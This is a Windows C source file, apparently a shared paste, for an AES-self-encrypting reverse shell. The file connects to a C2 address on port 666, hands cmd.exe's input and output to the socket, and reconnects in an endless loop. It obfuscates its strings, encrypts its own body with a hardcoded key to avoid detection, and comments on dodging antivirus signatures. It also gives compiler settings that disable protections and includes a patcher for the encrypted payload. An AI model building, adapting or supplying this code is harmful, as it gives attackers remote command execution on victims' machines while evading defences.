aes

1. // Self-encrypted (AES-256) plus reverse shell payload to 127.0.0.1:666. Run Netcat: nc -lvvp 666
2. // Some strings encrypted with https://www.stringencrypt.com (v1.4.0) [C/C++].
3.  
4. // MSVC Settings
5. // -------------
6. // Properties -> C/C++  -> Optimization    -> Disabled (/Od)
7. // Properties -> C/C++  -> Code Generation -> Security Check -> Disable Security Check (/GS-)
8. // Properties -> C/C++  -> Code Generation -> Runtime Library -> Multi-threaded (/MT)
9. // Properties -> Linker -> Advanced        -> Randomized Base Address -> No (/DYNAMICBASE:NO)
10. // Properties -> Linker -> Command Line    -> /SECTION:.text,RWE /SUBSYSTEM:WINDOWS /pdbaltpath:%_PDB%  
11.  
12.  
13. #define _CRT_SECURE_NO_DEPRECATE
14. #define _WINSOCK_DEPRECATED_NO_WARNINGS
15.  
16. #include <winsock2.h>
17. #include <windows.h>
18. #include <ws2tcpip.h>
19. #include <wincrypt.h>
20. #include <stdio.h>
21.  
22. #pragma comment(lib, "Ws2_32.lib")
23.  
24. #define AES_KEY_SIZE   32
25. #define IV_SIZE        16
26. #define AES_BLOCK_SIZE 16
27. #define ONE_SEC        1000
28. #define nop            __asm _emit 0x90
29.  
30. typedef struct AES256KEYBLOB_ {
31.     BLOBHEADER hdr;
32.     DWORD      len;
33.     BYTE       key[AES_KEY_SIZE];
34. } AES256KEYBLOB;
35.  
36.  
37. // -------------- Begin Body --------------
38.  
39. void begin_shell()
40. {
41.     USHORT C2Port = 666;
42.  
43.     // C2Server = "127.0.0.1"
44.     unsigned char C2Server[10];
45.  
46.     C2Server[7] = 0x2F; C2Server[1] = 0x33; C2Server[3] = 0x2F; C2Server[9] = 0x01;
47.     C2Server[2] = 0x38; C2Server[5] = 0x2F; C2Server[8] = 0x32; C2Server[0] = 0x32;
48.     C2Server[4] = 0x31; C2Server[6] = 0x31;
49.  
50.     for (unsigned int tauWy = 0, pcvuf = 0; tauWy < 10; tauWy++)
51.     {
52.         pcvuf = C2Server[tauWy];
53.         pcvuf--;
54.         C2Server[tauWy] = pcvuf;
55.     }
56.  
57.     // Process = "cmd.exe"
58.     unsigned char Process[8];
59.  
60.     Process[5] = 0x73; Process[7] = 0xF9; Process[4] = 0x61; Process[6] = 0x5F;
61.     Process[0] = 0x63; Process[3] = 0x2B; Process[1] = 0x6C; Process[2] = 0x62;
62.  
63.     for (unsigned int Fyrjn = 0, nVmGF = 0; Fyrjn < 8; Fyrjn++)
64.     {
65.         nVmGF = Process[Fyrjn];
66.         nVmGF += Fyrjn;
67.         Process[Fyrjn] = nVmGF;
68.     }
69.  
70.     // Persist until terminated.
71.     while (1)
72.     {
73.         SOCKET clientSocket;
74.         struct sockaddr_in addr;
75.         WSADATA version;
76.  
77.         if (WSAStartup(MAKEWORD(2, 2), &version) != 0) {
78.             continue;
79.         }
80.  
81.         clientSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
82.  
83.         addr.sin_family = AF_INET;
84.         addr.sin_addr.s_addr = inet_addr(C2Server);
85.         addr.sin_port = htons(C2Port);
86.  
87.         if (WSAConnect(clientSocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR)
88.         {
89.             closesocket(clientSocket);
90.             WSACleanup();
91.             continue;
92.         }
93.         else
94.         {
95.             STARTUPINFOA sinfo;
96.             PROCESS_INFORMATION pinfo;
97.             memset(&sinfo, 0, sizeof(sinfo));
98.             sinfo.cb = sizeof(sinfo);
99.             sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
100.             sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)clientSocket;
101.             // Avoid AV signatures?
102.             nop
103.             CreateProcessA(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
104.             WaitForSingleObject(pinfo.hProcess, INFINITE);
105.             CloseHandle(pinfo.hProcess);
106.             CloseHandle(pinfo.hThread);
107.             closesocket(clientSocket);
108.             WSACleanup();
109.         }
110.  
111.         Sleep(ONE_SEC);
112.     }
113. }
114.  
115. // -------------- End Body --------------
116.  
117.  
118. __declspec(naked) void end_shell(void)
119. {
120.     // The ciphertext Body is up to a block length (16 bytes) larger than the plaintext.
121.     __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
122.     __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
123.     __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
124.     __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
125. }
126.  
127.  
128. void AES256(BOOL bEncrypt)
129. {
130.     DWORD         body_len;
131.     size_t        body_size;
132.     LPBYTE        body_data;
133.     DWORD         aes_num_blocks;
134.     HCRYPTKEY     hKeyDuplicate;
135.     boolean       final;
136.     HCRYPTPROV    hProv;
137.     HCRYPTKEY     hKey;
138.     AES256KEYBLOB AESBlob;
139.  
140.     // Shhh...it's a secret!
141.     BYTE aes_key[] = { 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32,
142.                        0x33, 0x33, 0x33, 0x33, 0x34, 0x34, 0x34, 0x34,
143.                        0x35, 0x35, 0x35, 0x35, 0x36, 0x36, 0x36, 0x36,
144.                        0x37, 0x37, 0x37, 0x37, 0x38, 0x38, 0x38, 0x38 };
145.  
146.     BYTE iv[] = { 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32,
147.                   0x33, 0x33, 0x33, 0x33, 0x34, 0x34, 0x34, 0x34 };
148.  
149.     memset(&AESBlob, 0, sizeof(AESBlob));
150.     AESBlob.hdr.bType = PLAINTEXTKEYBLOB;
151.     AESBlob.hdr.bVersion = CUR_BLOB_VERSION;
152.     AESBlob.hdr.reserved = 0;
153.     AESBlob.hdr.aiKeyAlg = CALG_AES_256;
154.     AESBlob.len = AES_KEY_SIZE;
155.     memcpy(AESBlob.key, aes_key, AES_KEY_SIZE);
156.  
157.     CryptAcquireContextA(&hProv, NULL, MS_ENH_RSA_AES_PROV_A, PROV_RSA_AES, CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
158.     CryptImportKey(hProv, (LPBYTE)&AESBlob, sizeof(AES256KEYBLOB), 0, CRYPT_NO_SALT, &hKey);
159.     CryptSetKeyParam(hKey, KP_IV, iv, 0);
160.  
161.     body_size = (LPBYTE)end_shell - (LPBYTE)begin_shell;
162.     body_data = (LPBYTE)begin_shell;
163.  
164.     aes_num_blocks = body_size / AES_BLOCK_SIZE;
165.  
166.     while (aes_num_blocks != 0)
167.     {
168.         CryptDuplicateKey(hKey, NULL, 0, &hKeyDuplicate);
169.         final = (aes_num_blocks == 1) ? TRUE : FALSE;
170.         body_len = AES_BLOCK_SIZE;
171.         if (bEncrypt)
172.         {
173.             CryptEncrypt(hKeyDuplicate, 0, final, 0, body_data, &body_len, AES_BLOCK_SIZE * 2);
174.         }
175.         else
176.         {
177.             CryptDecrypt(hKeyDuplicate, 0, final, 0, body_data, &body_len);
178.         }
179.         CryptDestroyKey(hKeyDuplicate);
180.         body_data += AES_BLOCK_SIZE;
181.         aes_num_blocks--;
182.     }
183.  
184.     CryptDestroyKey(hKey);
185.     CryptReleaseContext(hProv, 0);
186.  
187.     if (bEncrypt)
188.     {
189.         // code_bin = "code.bin"
190.         BYTE code_bin[] = { 0x63, 0x6f, 0x64, 0x65, 0x2e, 0x62, 0x69, 0x6e, 0x00 };
191.         // mode = "wb"
192.         BYTE mode[] = { 0x77, 0x62, 0x00 };
193.  
194.         // Write encrypted Body to code.bin
195.         body_data = (LPBYTE)begin_shell;
196.         FILE* pFile = fopen(code_bin, mode);
197.         fwrite(body_data, sizeof(char), body_size + AES_BLOCK_SIZE, pFile);
198.         fclose(pFile);
199.     }
200. }
201.  
202.  
203. BOOL AlreadyRunning()
204. {
205.     // szMutex = "Global\\AI"
206.     unsigned char szMutex[10];
207.  
208.     szMutex[9] = 0x09; szMutex[1] = 0x6D; szMutex[0] = 0x47; szMutex[6] = 0x5A;
209.     szMutex[8] = 0x41; szMutex[5] = 0x69; szMutex[3] = 0x61; szMutex[4] = 0x65;
210.     szMutex[7] = 0x46; szMutex[2] = 0x6D;
211.  
212.     for (unsigned int vZunm = 0, sGnrH = 0; vZunm < 10; vZunm++)
213.     {
214.         sGnrH = szMutex[vZunm];
215.         sGnrH ^= vZunm;
216.         szMutex[vZunm] = sGnrH;
217.     }
218.  
219.     HANDLE  hStartEvent = CreateEventA(NULL, FALSE, FALSE, szMutex);
220.  
221.     if (hStartEvent == NULL)
222.     {
223.         return FALSE;
224.     }
225.  
226.     if (GetLastError() == ERROR_ALREADY_EXISTS)
227.     {
228.         CloseHandle(hStartEvent);
229.         return TRUE;
230.     }
231.  
232.     return FALSE;
233. }
234.  
235.  
236. int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpszCmdLine, _In_ int nCmdShow)
237. {
238.     if (!AlreadyRunning())
239.     {
240.         DWORD ate_bad_food = _byteswap_ulong(*(LPDWORD)end_shell);
241.  
242.         if (ate_bad_food != 0x8BADF00D)
243.         {
244.             // Decrypt Body
245.             AES256(FALSE);
246.  
247.             begin_shell();
248.         }
249.         else
250.         {
251.             // Encrypt Body
252.             AES256(TRUE);
253.         }
254.     }
255.  
256.     return 0;
257. }
258.  
259.  
260.  
261.  
262. /*
263.  
264. // Patch payload file code.bin to aes.exe offset: 0000:0400  ...
265.  
266. #define _CRT_SECURE_NO_DEPRECATE
267. #define _WINSOCK_DEPRECATED_NO_WARNINGS
268.  
269. #include <stdio.h>
270. #include <stdlib.h>
271.  
272. int main()
273. {
274.     FILE* fpc = fopen("code.bin", "rb");
275.     fseek(fpc, 0, SEEK_END);
276.     unsigned long len = ftell(fpc);
277.     unsigned char* buffer = malloc(len);
278.     rewind(fpc);
279.     fread(buffer, 1, len, fpc);
280.     fclose(fpc);
281.  
282.     FILE* fp = fopen("aes.exe", "r+b");
283.     fseek(fp, 0x400, SEEK_SET);
284.     fwrite(buffer, 1, len, fp);
285.     free(buffer);
286.     fclose(fp);
287.  
288.     return 0;
289. }
290.  
291. */
292.